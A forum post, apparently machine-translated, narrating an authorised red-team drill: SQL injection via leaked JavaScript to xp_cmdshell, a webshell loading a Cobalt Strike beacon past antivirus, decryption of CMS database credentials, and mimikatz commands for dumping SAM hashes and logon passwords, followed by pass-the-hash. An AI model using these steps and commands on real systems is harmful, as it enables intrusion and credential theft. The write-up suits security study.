Jump to content

Title: Remember the horizontal case from JS to the intranet once

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Foreword

Some time ago, I participated in an offensive and defensive drill. After using conventional vulnerabilities, I thought that many masters had shared articles looking for breakthroughs in JS, so I just started JS and finally opened the intranet entrance to obtain target permissions and personal information. Let’s share the process here.

Statement: In this drill, all test equipment is provided by the organizer, all traffic is archived for audit, all operations are completed under authorization, and all data has been safely destroyed after the end.

Doing through JS

There is only one login page at the beginning, the username cannot be enumerated and the attempt to explode failed.

1049983-20230421162846001-590057695.jpg

Use bp to catch packets to view JS-related files and find that there are SQL statements

1049983-20230421162846874-1444649661.jpg

Tracking comboxSQL variables, and discovering that an action class is defined

1049983-20230421162847615-1929940280.jpg

Search for this action classpath and find that the access method is through url stitching.

1049983-20230421162848353-2077148943.jpg

The path is spliced and the parameters are entered into the SQL statement. The test found that the database is an mssql database. System commands can be executed through xp_cmdshell.

1049983-20230421162849113-20833891.jpg

shellcodeloader is available online CS

After executing the system permission, I planned to use remote download to go online without killing the cs, but it was not successfully launched. I found that there was 360 Enterprise Cloud, which triggered the intercept of the execution of the exe.

1049983-20230421162849831-1377837346.jpg

Change your thinking. After downloading Godzilla webshell, use Godzilla's shellcodeloader function to load your own CS Trojan shellcode to successfully go online.

1049983-20230421162850477-227933550.jpg

Decrypt database configuration information

Because when exe files are executed, access is denied and the file cannot be run. By searching for the local configuration file, the database account password was found, but the database password was encrypted.

1049983-20230421162851223-804733282.jpg

By searching for historical website backup files, the system's early configuration files were not configured for database password encryption, and the test found that it was possible to connect to the database.

1049983-20230421162852001-751908926.jpg When looking up the database backup file of this system, I accidentally discovered another business system deployed by the server, and the account number, password and database ip in the database configuration file are also encrypted storage.

1049983-20230421162852792-1421720165.jpg

By finding the system characteristics, it is discovered as a SiteServer CMS system. I found the SiteServer CLI, a dedicated encryption and decryption tool for this cms, from searching online.

After running 1049983-20230421162853567-1190126543.jpg, you can also obtain the database plaintext configuration information

Server=x.x.x.x;Uid=sa;Pwd=xxCSthink!@#123;Database=NEWdfgxxcs enables the proxy to connect, and the test connection is successful

1049983-20230421162854235-54742713.jpg

However, it was also found that the database server could not execute the exe program, could not run mimikatz to read the administrator hash, could not create a user, could not upload tscan for intranet scanning, so I was so embarrassed to stay here. Finally, use the information detection of the CSS plug-in to detect intranet segment assets.

1049983-20230421162854970-187933157.jpg

Using 17010 plugin attack failed

1049983-20230421162855722-1067996590.jpg

Use proxychains to cooperate with msf to obtain PC permissions Image

1049983-20230421162857116-372680895.jpg Use mimikaz to read the administrator password to enable remote desktop and find that it is impossible to log in.

1049983-20230421162857804-1002896266.jpg

msf loading mimikaz module

privilege:debug

ts:multirdp

Get the intranet permissions

Create a new user and enter your personal PC computer

1049983-20230421162858564-402275774.jpg

Through this PC as a base, upload TideFinger and Tscan to perform intranet scanning. It is necessary to introduce these two tools here.

The TideFinger fingerprint recognition function of Go language version: 1. Added Dismap, Vscan, Kscan, fofa, ServerScan and other fingerprints 2. Added ServerScan's non-web service fingerprint to optimize the coroutine concurrency efficiency of asset discovery. 3. The display effect is borrowed from Dismap, and it should be currently higher in terms of efficiency and fingerprint coverage.

1049983-20230421162859263-1813055310.jpg

Tscan functions of Go language version: 1. Tscan is an internal and external network asset scanning tool jointly maintained by the Tide security team. 2. The basic code is iterated with the update of Fscan 3. Linked with the Chaosheng POC vulnerability detection platform, team members will write the recent pocs that have been exposed every month and regularly collect and organize the published pocs on the Internet and finally update and release them.

1049983-20230421162859956-1543115676.jpg

After scanning the intranet network segment, the next step is the vulnerability verification process. I glanced at it and found no holes that could getshell directly. However, the fingerprint detected that one of the intranet IPs opened with port 2222 as rmi.

1049983-20230421162900571-2117737162.jpg Image

Although the server has obtained permission, no other relevant account password information was found when collecting information on this server.

SAM file get user hash

Use the sekurlsa:logonpasswords command in mimikaz to try to read the information of the process lsas to obtain the password information of the currently logged in user. The output result shows that there is no user information such as administrator (mainly because when using the permission to use Cs, it is estimated that the soft-killing strategy was triggered, causing the server to restart). Then, using query user, I found that the administrator user is not online, so I cannot directly read the administrator hash through memory. Use mimikaz to read hash in SAM file.

#Elevate permissions

privilege:debug

#Elevate to system

token:elevate

#Crawl sam

lsadump:sam 1049983-20230421162901858-1741339910.jpg

hash delivery

After getting the NTLM Hash, I found that I could not directly decrypt the plain text password from the online website. The obtained NTLM hash is passed through the hash to obtain the permissions of the four servers.

1049983-20230421162902595-861301691.jpg

Next, use hash to log in to the server and continue to collect information. A remote desktop of the nesting doll was found in one of the servers, and it was for the 03 system

1049983-20230421162903307-2132010902.jpg

Rules for obtaining server password

Read this password through mimikaz (before KB2871997, Mimikatz could directly grab the plaintext password)

*Username:Administrator

*Domain:WIN-LAOLOVGMF

*Password:

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.